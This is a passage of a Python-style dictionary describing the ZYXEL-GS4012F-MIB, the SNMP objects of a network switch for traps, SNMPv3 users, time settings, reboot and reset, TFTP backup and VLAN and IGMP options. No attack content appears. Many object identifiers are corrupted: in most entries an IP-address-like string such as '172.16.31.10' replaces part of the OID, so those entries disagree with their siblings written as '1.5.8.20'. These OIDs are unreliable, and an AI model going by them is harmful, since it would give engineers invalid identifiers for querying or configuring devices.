"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4",
"status" : "current",
"description" :
"""""",
}, # table
"snmpTrapDestEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1",
"create" : "true",
"status" : "current",
"linkage" : [
"snmpTrapDestIP",
],
"description" :
"""An entry in snmpTrapDestTable.""",
}, # row
"snmpTrapDestIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "noaccess",
"description" :
"""IP address of trap destination.""",
}, # column
"snmpTrapDestRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapDestPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The UDP port of the trap destination.""",
}, # column
"snmpTrapVersion" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"v1" : {
"nodetype" : "namednumber",
"number" : "0"
},
"v2c" : {
"nodetype" : "namednumber",
"number" : "1"
},
"v3" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The SNMP protocol version to send traps.""",
}, # column
"snmpTrapUserName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""The user name for sending SNMPv3 traps.""",
}, # column
"snmpVersion" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"v2c" : {
"nodetype" : "namednumber",
"number" : "0"
},
"v3" : {
"nodetype" : "namednumber",
"number" : "1"
},
"v3v2c" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The SNMP version to be used. v3v2c means that the manager
can get/set by SNMPv3 and can get by SNMPv2c.""",
}, # scalar
"snmpUserTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6",
"status" : "current",
"description" :
"""A table that contains SNMPv3 user information.""",
}, # table
"snmpUserEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1",
"status" : "current",
"linkage" : [
"snmpUserName",
],
"description" :
"""An entry of snmpUserTable.""",
}, # row
"snmpUserName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""The user name.""",
}, # column
"snmpUserSecurityLevel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"noAuthNoPriv" : {
"nodetype" : "namednumber",
"number" : "0"
},
"authNoPriv" : {
"nodetype" : "namednumber",
"number" : "1"
},
"authPriv" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The level of security at which SNMP messages can be sent or
with which operations are being processed.""",
}, # column
"snmpUserAuthProtocol" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"md5" : {
"nodetype" : "namednumber",
"number" : "0"
},
"sha" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""The type of authentication protocol to be used.""",
}, # column
"snmpUserPrivProtocol" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.6.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"des" : {
"nodetype" : "namednumber",
"number" : "0"
},
"aes" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""The type of privacy protocol to be used.""",
}, # column
"snmpTrapGroupTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7",
"status" : "current",
"description" :
"""""",
}, # table
"snmpTrapGroupEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1",
"status" : "current",
"linkage" : [
"snmpTrapDestIP",
],
"description" :
"""An entry in snmpTrapGroupTable.""",
}, # row
"snmpTrapSystemGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.10.7.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"coldStart" : {
"nodetype" : "namednumber",
"number" : "0"
},
"warmStart" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fanSpeed" : {
"nodetype" : "namednumber",
"number" : "2"
},
"temperature" : {
"nodetype" : "namednumber",
"number" : "3"
},
"voltage" : {
"nodetype" : "namednumber",
"number" : "4"
},
"reset" : {
"nodetype" : "namednumber",
"number" : "5"
},
"timeSync" : {
"nodetype" : "namednumber",
"number" : "6"
},
"intrusionlock" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapInterfaceGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.10.7.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"linkup" : {
"nodetype" : "namednumber",
"number" : "0"
},
"linkdown" : {
"nodetype" : "namednumber",
"number" : "1"
},
"autonegotiation" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapAAAGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"authentication" : {
"nodetype" : "namednumber",
"number" : "0"
},
"accounting" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapIPGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"ping" : {
"nodetype" : "namednumber",
"number" : "0"
},
"traceroute" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"snmpTrapSwitchGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.7.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"stp" : {
"nodetype" : "namednumber",
"number" : "0"
},
"mactable" : {
"nodetype" : "namednumber",
"number" : "1"
},
"rmon" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dateTimeSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.11",
}, # node
"dateTimeServerType" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.11.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "1"
},
"daytime" : {
"nodetype" : "namednumber",
"number" : "2"
},
"time" : {
"nodetype" : "namednumber",
"number" : "3"
},
"ntp" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readwrite",
"description" :
"""The time service protocol.""",
}, # scalar
"dateTimeServerIP" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""IP address of time server.""",
}, # scalar
"dateTimeZone" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The time difference between UTC. Ex: +01""",
}, # scalar
"dateTimeNewDateYear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new date in year.""",
}, # scalar
"dateTimeNewDateMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new date in month.""",
}, # scalar
"dateTimeNewDateDay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new date in day.""",
}, # scalar
"dateTimeNewTimeHour" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new time in hour.""",
}, # scalar
"dateTimeNewTimeMinute" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new time in minute.""",
}, # scalar
"dateTimeNewTimeSecond" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""The new time in second.""",
}, # scalar
"dateTimeDaylightSavingTimeSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10",
}, # node
"daylightSavingTimeState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service enabled/disabled for the switch.""",
}, # scalar
"daylightSavingTimeStartDateWeek" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.11.10.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"first" : {
"nodetype" : "namednumber",
"number" : "1"
},
"second" : {
"nodetype" : "namednumber",
"number" : "2"
},
"third" : {
"nodetype" : "namednumber",
"number" : "3"
},
"fourth" : {
"nodetype" : "namednumber",
"number" : "4"
},
"last" : {
"nodetype" : "namednumber",
"number" : "5"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start week.""",
}, # scalar
"daylightSavingTimeStartDateDay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"sunday" : {
"nodetype" : "namednumber",
"number" : "0"
},
"monday" : {
"nodetype" : "namednumber",
"number" : "1"
},
"tuesday" : {
"nodetype" : "namednumber",
"number" : "2"
},
"wednesday" : {
"nodetype" : "namednumber",
"number" : "3"
},
"thursday" : {
"nodetype" : "namednumber",
"number" : "4"
},
"friday" : {
"nodetype" : "namednumber",
"number" : "5"
},
"saturday" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start day.""",
}, # scalar
"daylightSavingTimeStartDateMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"january" : {
"nodetype" : "namednumber",
"number" : "1"
},
"february" : {
"nodetype" : "namednumber",
"number" : "2"
},
"march" : {
"nodetype" : "namednumber",
"number" : "3"
},
"april" : {
"nodetype" : "namednumber",
"number" : "4"
},
"may" : {
"nodetype" : "namednumber",
"number" : "5"
},
"june" : {
"nodetype" : "namednumber",
"number" : "6"
},
"july" : {
"nodetype" : "namednumber",
"number" : "7"
},
"august" : {
"nodetype" : "namednumber",
"number" : "8"
},
"september" : {
"nodetype" : "namednumber",
"number" : "9"
},
"october" : {
"nodetype" : "namednumber",
"number" : "10"
},
"november" : {
"nodetype" : "namednumber",
"number" : "11"
},
"december" : {
"nodetype" : "namednumber",
"number" : "12"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start month.""",
}, # scalar
"daylightSavingTimeStartDateHour" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service start time.""",
}, # scalar
"daylightSavingTimeEndDateWeek" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"first" : {
"nodetype" : "namednumber",
"number" : "1"
},
"second" : {
"nodetype" : "namednumber",
"number" : "2"
},
"third" : {
"nodetype" : "namednumber",
"number" : "3"
},
"fourth" : {
"nodetype" : "namednumber",
"number" : "4"
},
"last" : {
"nodetype" : "namednumber",
"number" : "5"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end week.""",
}, # scalar
"daylightSavingTimeEndDateDay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.7",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"sunday" : {
"nodetype" : "namednumber",
"number" : "0"
},
"monday" : {
"nodetype" : "namednumber",
"number" : "1"
},
"tuesday" : {
"nodetype" : "namednumber",
"number" : "2"
},
"wednesday" : {
"nodetype" : "namednumber",
"number" : "3"
},
"thursday" : {
"nodetype" : "namednumber",
"number" : "4"
},
"friday" : {
"nodetype" : "namednumber",
"number" : "5"
},
"saturday" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end day.""",
}, # scalar
"daylightSavingTimeEndDateMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.8",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"january" : {
"nodetype" : "namednumber",
"number" : "1"
},
"february" : {
"nodetype" : "namednumber",
"number" : "2"
},
"march" : {
"nodetype" : "namednumber",
"number" : "3"
},
"april" : {
"nodetype" : "namednumber",
"number" : "4"
},
"may" : {
"nodetype" : "namednumber",
"number" : "5"
},
"june" : {
"nodetype" : "namednumber",
"number" : "6"
},
"july" : {
"nodetype" : "namednumber",
"number" : "7"
},
"august" : {
"nodetype" : "namednumber",
"number" : "8"
},
"september" : {
"nodetype" : "namednumber",
"number" : "9"
},
"october" : {
"nodetype" : "namednumber",
"number" : "10"
},
"november" : {
"nodetype" : "namednumber",
"number" : "11"
},
"december" : {
"nodetype" : "namednumber",
"number" : "12"
},
},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end month.""",
}, # scalar
"daylightSavingTimeEndDateHour" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.11.10.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Daylight saving time service end time.""",
}, # scalar
"sysMgmt" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12",
}, # node
"sysMgmtConfigSave" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"config_1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"config_2" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""If setting value is given, the variable write index will be set and running-config will be written to the assigned configuration file.
If not, running-config will be written to the booting one.""",
}, # scalar
"sysMgmtBootupConfig" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"config_1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"config_2" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The setting value (read index) will be written into non-volatile memory.
While rebooting, the variable write index is equal to read index initially.
You can change the value of write index by CLI / MIB.""",
}, # scalar
"sysMgmtReboot" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"nothing" : {
"nodetype" : "namednumber",
"number" : "0"
},
"reboot" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""Reboot switch from SNMP. 1:Reboot, 0:Nothing""",
}, # scalar
"sysMgmtDefaultConfig" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"nothing" : {
"nodetype" : "namednumber",
"number" : "0"
},
"reset_to_default" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""Erase running config and reset to default.""",
}, # scalar
"sysMgmtLastActionStatus" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.12.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"success" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fail" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""Display status of last mgmt action.""",
}, # scalar
"sysMgmtSystemStatus" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"sysAlarmDetected" : {
"nodetype" : "namednumber",
"number" : "0"
},
"sysTemperatureError" : {
"nodetype" : "namednumber",
"number" : "1"
},
"sysFanRPMError" : {
"nodetype" : "namednumber",
"number" : "2"
},
"sysVoltageRangeError" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""This variable indicates the status of the system.
The sysMgmtAlarmStatus is a bit map represented
a sum, therefore, it can represent multiple defects
simultaneously. The sysNoDefect should be set if and only if
no other flag is set.
The various bit positions are:
0 sysAlarmDetected
1 sysTemperatureError
2 sysFanRPMError
3 sysVoltageRangeError""",
}, # scalar
"sysMgmtCPUUsage" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Show device CPU load in %, it's the snapshot of CPU load when
getting the values.""",
}, # scalar
"sysMgmtCounterReset" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enable" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disable" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""Reset all port counters.""",
}, # scalar
"sysMgmtTftpServiceSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.10",
}, # node
"sysMgmtTftpServerIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.10.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
""" IP address of TFTP server""",
}, # scalar
"sysMgmtTftpRemoteFileName" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.10.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""The file name that you want to backup to or restore from TFTP server""",
}, # scalar
"layer2Setup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13",
}, # node
"vlanTypeSetup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dot1Q" : {
"nodetype" : "namednumber",
"number" : "1"
},
"port_based" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpSnoopingStateSetup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"tagVlanPortIsolationState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"stpState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpFilteringStateSetup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"unknownMulticastFrameForwarding" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"flooding" : {
"nodetype" : "namednumber",
"number" : "1"
},
"drop" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"multicastGrpHostTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Specify host timeout for all multicast groups when the specific port is in auto mode.""",
}, # scalar
"multicastGrpLeaveTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Specify leave timeout for all multicast groups.""",
}, # scalar
"reservedMulticastFrameForwarding" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"flooding" : {
"nodetype" : "namednumber",
"number" : "1"
},
"drop" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpsnp8021pPriority" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Set the 802.1p priority of control messages for igmp-snooping(0~8, 8-No Change)""",
}, # scalar
"igmpsnpVlanMode" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.11",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"auto" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fixed" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"stpMode" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.12",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"rstp" : {
"nodetype" : "namednumber",
"number" : "1"
},
"mrstp" : {
"nodetype" : "namednumber",
"number" : "2"
},
"mstp" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpsnpVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.13",
"status" : "current",
"description" :
"""""",
}, # table
"igmpsnpVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.13.1",
"create" : "true",
"status" : "current",
"linkage" : [
"igmpsnpVid",
],
"description" :
"""An entry in IgmpsnpVlanTable.""",
}, # row
"igmpsnpVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.13.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpsnpVlanName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.13.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"igmpsnpVlanRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.13.1.3",
"status" : "current",
"syntax" : {
